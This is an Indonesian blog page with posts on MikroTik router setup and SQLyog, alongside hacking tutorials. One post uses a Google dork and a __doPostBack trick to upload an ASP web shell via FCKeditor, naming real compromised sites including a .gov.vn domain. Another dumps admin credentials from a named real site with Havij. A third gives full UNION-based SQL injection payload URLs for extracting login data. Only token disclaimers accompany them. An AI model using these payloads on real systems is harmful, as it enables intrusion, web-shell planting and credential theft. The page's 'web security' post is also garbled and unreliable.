Asmaul Husna

Sabtu, 12 Mei 2012

Mensetting Mirotik Pada Winbox


Cara Setting Mikrotik Menggunakan Winbox


Sebelum kita memulai, sebaiknya kita samakan dulu persepsi. Pada tutorial berikut kita akan konfigurasi router mikrotik untuk warnet dengan menggunakan koneksi ADSL Speedy. Dial ke internet tetap dilakukan oleh modem ADSL. Topologinya sebagai berikut.
setting mikrotik
Secara default modem adsl speedy di set sebagai DHCP server dengan IP default 192.168.1.1 dan melakukan dial ke DSLAM speedy menggunakan PPPoE. Pada tutorial kali ini, anggap sajah speedy kita sudah jalan dan kita sudah bisa internetan melalui laptop yang di colokan ke modem speedy langsung dengan kabel UTP.
Langkah selanjutnya adalah setting IP di mikrotik, kita buat statik sajah biar gampang dan mudah dipahami. Ingat, modem speedy dengan ip default 192.168.1.1 akan kita jadikan gateway di mikrotik sebagaimana topologi diatas.
Hidupkan mikrotik anda kemudian colokan laptop/komputer anda ke ether2 mikrotik menggunakan kabel UTP.
Setting IP komputer anda menjadi :
IP Address :192.168.10.2
Subnet : 255.255.255.0
Gateway : 192.168.10.1
DNS : 192.168.10.1
Selanjutnya masuk ke mikrotik menggunakan winbox.
Jika sudah masuk kedalam winbox, Klik menu IP -> Address Klik tanda plus berwarna merah.
Masukan IP untuk ether1 (Publik) 192.168.1.2/24 kemudian klik APPLY dan OK

Masukan Ip satu lagi untuk ether2 (Lokal) 192.168.10.1/24 Klik APPLY klik OK

Masukan gateway di dalam mikrotik dalam hal ini IP Modem Speedy akan dijadikan gateway oleh mikrotik. Masukan IP 192.168.1.1 pada kolom Gateway. Klik OK
Klik IP -> Route kemudian klik tanda plus merah

Selanjutnya masukan DNS Speedy, contoh : 202.134.0.155
Klik menu IP -> DNS
dns-mikrotik
Sampai disini kita coba test ping dari dalam mikrotik ke gateway (modem speedy) IP 192.168.1.1
Klik New Terminal pada menu Winbox kemudian ketikan,
ping 192.168.1.1
Jika Reply berarti koneksi ke modem sudah berjalan.
Selanjutnya test ping ke DNS speedy
ping 202.134.0.155
Jika reply berarti koneksi dari dalam mikotik ke internet sudah berjalan.
Sebelum kita test ping dari komputer ke internet, kita harus membuat NAT terlebih dahulu agar semua komputer yang ada di belakang mikrotik bisa internetan. Caranya,
Klik IP -> Firewall -> klik tab NAT
pada tab general pilih src-nat dan pada tab action pilih masquerade
Klik OK
Langkah selanjutnya adalah test ping dari komputer ke internet.
Kita tidak perlu settig IP lagi karena sudah kita setting sebelumnya.
Buka Command Prompt dengan cara klik Start -> Run kemudian ketik CMD lalu ENTER.
Pada layar command prompt coba ping ke DNS lalu ke yahoo atau google.
ping 202.134.0.155
ping yahoo.com
Jika Reply berarti anda telah sukses melakukan setting mikrotik sebagai router meggunakan winbox. Jika nantinya internet akan dibagi untuk beberapa komputer maka kabel yang dari ether2 colokan ke switch dan setiap user masukan IP seperti yang tadi dipasang di komputer anda.
Diposting oleh di 21.05 0 komentar

Cara Mengaudit Web Denga Konsep Dork

Banyak teknik utk meng-audit websites target...
Pertama : melakukan identifikasi websites target.
Kedua : mencari hole websites target.
Ketiga : mengakses / masuk ke websites target.
Keempat : upload Shell.
Kelima : Full Akses Websites target...



==========

inurl:"fcklinkgallery.aspx"
misalnya ketemu :
http://fril.co.il/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

==> Selanjutnya klik pilihan yg paling bawah : ( File ( A File On Your Site )
==> lalu di pada browser-nya paste aja magic command ini :
javascript:__doPostBack('ctlURL$cmdUpload','')
===> "SIM SALABIM" Selanjutnya akan muncul link UPLOAD.

setelah itu, lakukan upload file... bisa JPG maupun SHELL ASP.

Selanjutnya buka hasil upload nya di :

http://fril.co.il/portals/0/gerandongers.jpg

Sim Salabim,... PROK PROK jadi Gerandong...

http://fril.co.il/portals/0/gerandongers.jpg


~~~~~~~~~~~~~~~~~~~~~


http://www.vieclamvietnam.gov.vn/portals/0/gerandongers.jpg
Jadikan Semua Pembelajaran ini untuk pembelajaran bukan Untuk Disalahgunakan
Diposting oleh di 20.21 0 komentar

cara menggunakan havij software untuk sql injection

Havij 1.10 SQL Injector
Tutor Cara memakai Havij 1.10 SQL Injector
Ini saya mengambil tips dari teman, kemarin telah posted tutor menjalankan program ini, aku cuma copy paste berhubung memang lagi malas, untuk mengulas dan bikin gambar sendiri :
Sebelum nya yang harus dipersiapkan adalah :
1. konek ke internet
2. Download program Havij 1.10 Download
Kita mulai mencoba website
contoh target kita kali ini yaitu http://www.mdsuk.org/content.php?id=8
1) Pertama jalankan program havij ………
trus masukan url target lalu klick gambar segitiga “analyze”
hasilnya kita akan mendapatkan info dari website tersebut ..
2) kedua klick tab info untuk mendapatkan informasi database na dan klick get

3) Setelah mendapatkan informasi database nah …
sekarang kita ke tab tables untuk mendapatkan tabelsnya, klick get tables dan akhirnya dapet tabelsnya, dan kelihatanlah tables adminya “tbl_admin_user”

4) Setelah itu kita akn mencari columns admin caranya centangin “tbl_admin_user” dan klick get columns dan akhirnya di dapatkan columns “tbl_admin_user”
nah sudah terpampang jelas di mata kita columns username dan password admin….

5) Centangin table username dan password dan klick get data

Akhirnya dapat sudah username dan password admin … wah senangnya …
Tapi tunggu dulu itu password admin masih terencrypte …
Untung havij ini menyediakan tools descrypte md5 untuk mendescrypte password tersebut
6) klick tab yg gambar kunci warna kuning yg tulisannya md5
lalu masukin passwrd encrypte admin tersebut dan klcik start
tunggu sejenak ….dan akhirnya dapet deh password descrypte admin
Selanjut nya kita cari admin page nya …

7) klick tab find admin trus masukin url target dan klick start …tgu sejenak dan akhirnya di dapatkan deh admin page nya

Nah sekarang baru bisa masuk dan selanjut nya terserah anda …. Nah Bila Disalah Gunakan Bukan Tanggung Jawab Saya hati-Hati Pembelajaran ini untuk latihan bukan untuk merugikan orang lain
Diposting oleh di 20.17 0 komentar

Cara mudah membuat struktur database mysql menggunakan SQLyog

terkadang untuk membuat suatu struktur database di mysql secara manual atau mengunakan command promt memang sedikit sulit, karena untuk membuat struktur databasenya kita harus mengetik command-command sql baris per baris, begitu juga dalam pembuatan tabelnya.
ada cara yang lebih mudah untuk membuat struktur database, yaitu dengan applikasi pembantu, seperti phpmyadmin yang berbasis web dan SQLyog yang berbasis desktop, dengan aplikasi ini pembuatan struktur database akan menjadi lebih mudah dan cepat apalagi struktur yang akan dibuat cukup rumit. sudah jangan banyak bicara, jadi bagaimana cara menggunakannya????!!!!
OK, tapi pertama2 download dulu SQLyognya disini

Oia.. aplikasi ni ada yang gratis ada juga yang berbayar…
trus install, gampang qo, tinggal next ajah,
nah selanjutnya kita harus konek dulu ma mysql servernya..
klik new connection, maka akan tampil kyk gni
bagian pertama
klik new (untuk yang pertama kali) beri nama untuk koneksinya
new connect
nah udah itu, isi beberapa parameter biar konek ma mysql servernya
secara default mysql hostnya adalah localhost, kita bisa menggantinya apabila kita mengakses mysql secara remote, jangan lupa sesuaikan juga username, password, dan nomor portnya (default port :3306), untuk databasenamenya bisa dikosongkan saja.
3
tinggal klik connect, klo settingannya betul, maka akan muncul seperti ini.
4
untuk membuat databasenya, kita klik DB lalu create database.. lalu isi deh nama databasenya.
untuk membuat tabel klik nama database di kolom yang sebelah kiri, lalu klik DB >> create table
61
tinggal isi deh strukturnya, klo mw liat hasilnya ya kita liat aja strukturnya di command prompt
7
nah dengan begini membuat struk database bukan lagi hal yang sulit kan????
Diposting oleh di 20.14 0 komentar

Contoh IP Private dan IP Public


Berikut Ini Adalah Contoh Penjelasan Dimana IP Public Itu Berada dan IP Private Itu Berada
Diposting oleh di 20.09 0 komentar

Sql Injection

Definisi Menurut para Ahli SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Definisi Umum SQL injection adalah serangan yang memanfaatkan kelalaian dari website yang mengijinkan user untuk menginputkan data tertentu tanpa melakukan filter terhadap malicious character. Inputan tersebut biasanya di masukan pada box search atau bagian-bagian tertentu dari website yang berinteraksi dengan database SQL dari situs tersebut. Perintah yang dimasukan para attacker biasanya adalah sebuah data yang mengandung link tertentu yang mengarahkan para korban ke website khusus yang digunakan para attacker untuk mengambil data pribadi korban. Untuk menghindari link berbahaya dari website yang telah terinfeksi serangan SQL injection, Anda dapat menggunakan aplikasi tambahan seperti NoScript yang merupakan Add-ons untuk aplikasi web browser Firefox. Meskipun tidak terlalu sempurna, setidaknya Anda dapat mengurangi kemungkinan Anda menjadi korban.

Berikut Adalah Langkah-Langkah Menggunakan SQL Injection
Ada Tujuh Tahapan Yaitu :
===========
= Step Satu:  =
===========
carilah target
misalkan: http//www.snipp55.com/berita.php?id=100
Tambahkan karakter ( ‘ ) pada akhir url atau menambahkan karakter ( – ) untuk melihat apakah ada pesan error.
contoh:
http//www.snipp55.com/berita.php?id=100′ atau
http//www.snipp55.com/berita.php?id=-100
sehingga muncul pesan error seperti berikut :
” Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/html/classes/storedProcedures/GetArticleData.class.php on line 92 “
(dan masih banyak lagi pesan error yg lainnya)

==========
= Step Dua: =
==========
mencari dan menghitung jumlah table yang ada dalam databasenya…
gunakan perintah : order by
contoh:
http//www.snipp55.com/berita.php?id=-100+order+by+1–  atau
http//www.snipp55.com/berita.php?id=-100+order+by+1/*
ceklah secara step by step (satupersatu)…
misal:
http//www.snipp55.com/berita.php?id=-100+order+by+1–
http//www.snipp55.com/berita.php?id=-100+order+by+2–
http//www.snipp55.com/berita.php?id=-100+order+by+3–
http//www.snipp55.com/berita.php?id=-100+order+by+4– dst
sehingga muncul pesan error…
misal pesan errornya muncul di table 9 :
http//www.snipp55.com/berita.php?id=-100+order+by+9–
berarti table yang terdapat dalam database adalah 8
menjadi http//www.snipp55.com/berita.php?id=-100+order+by+8–

===========
= Step Tiga:   =
===========
mencari nomor keberuntungan dengan menggunakan perintah union select
karena tadi tablenya hanya ada 8
maka: http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–
ok seumpama yg keluar adalah angka 5
maka gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai, masukan perintah tsb pada angka yg keluar tadi
misal: http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–
lalu lihat versi database yg digunakan seumpama versi 4 maka tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema
jika versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema

============
= Step Empat:=
============
menampilkan table yg ada pada web tsb dengan
perintah group_concat(table_name)         >>> dimasukan pada angka keberuntungan yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()–        >>> dimasukan setelah angka terakhir
Contoh :
http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()–
ibaratkan yang muncul adalah table  “admin”

===========
= Step Lima:=
===========
menampilkan kolom yang terdapat di table “admin”
perintah group_concat(column_name)         >>> dimasukan pada angka keberuntungan yg keluar tadi
perintah +from+information_schema.columns+where+table_name=Oxhexa–       >>> dimasukan setelah angka terakhir
Contoh :
http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=Oxhexa–
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :
http://home2.paulschou.net/tools/xlate/
contoh kata yg ingin di konversi yaitu “admin” (tanpa tanda kutip) maka akan menjadi 61646d696e
maka : http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=Ox61646D696E–
ibaratkan yang muncul adalah column username,password,email

============
= Step Enam : =
============
memunculkan apa yg tadi telah dikeluarkan dari column yaitu dengan cara
perintah concat_ws(Ox3a,hasil isi column yg akan dikeluarkan)         >>> dimasukan pada angka keberuntungan yg keluar tadi
perintah +from+(nama table berasal)          >>> dimasukan setelah angka terakhir
Contoh :
http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,concat_ws(Ox3a,column yang akan dilihat isinya),6,7,8+from+(nama table)–
contoh column yang keluar td adalah column username,password,email
Maka :
http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,concat_ws(Ox3a,username,Ox3a,password,Ox3a,email),6,7,8+from+admin–
contoh yang keluar :
admin:an4kal4y:alay_alay@alay.com
cara membaca nya seperti berikut :
username : admin
password : an4kal4y
email : alay_alay@alay.com

==============
= Step Tujuh    :   =
==============
tahap terakhir yang harus dilakukan adalah mencari halaman admin atau login (adminlogin).
website yang menyediakan program pencarian login admin :
http://revtan.site40.net/admin/?
Selamat Mencoba
“saya tidak bertanggung jawab bila ada yang menyalahgunaan informasi yang ada di blog ini”
“anda yang berbuat,anda yang menerima”     ^_^
Diposting oleh di 20.05 0 komentar

Kemanan Web

Firewall Sebuah Keamanan Security Website Didalam Sebuah Perangkat Sebuah Komputer.
Security Website dapat ditembus oleh para hacking, ada beberapa macam dalam penyelewengan security web  yaitu  :
  1. Dari Sisi Database adalah Sql Injection
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

     2.   Dari Sisi Program PHP dengan cara memasukan Skrip Upload file tanpa login contoh upload foto yang dibuat oleh gerandong Team yaitu Shelvy dengan cara Root --> Server dengan tampilan (007.jpg) hal ini merupakan sebuah hasil encripsi.

Port-Port yang sering ditembus oleh para hacker yaitu :
  • Port Web 80
  • Upload 21
  • Security 22/23
Sedangkan Jaringanpun Mendapatkan serangan-serangan seperti
  • Admin
  1. Make Adress
  2. SOP
  • User
  1. User Name
  2. Password
  • Bandwith Internet Cepat Habis
  • Virus Jaringan 
  1. Dial Speedy Error
  2. Selalu Memperlihatkan Sisi Broadcast yang Terbuka
Diposting oleh di 19.58 0 komentar
Langganan: Postingan (Atom)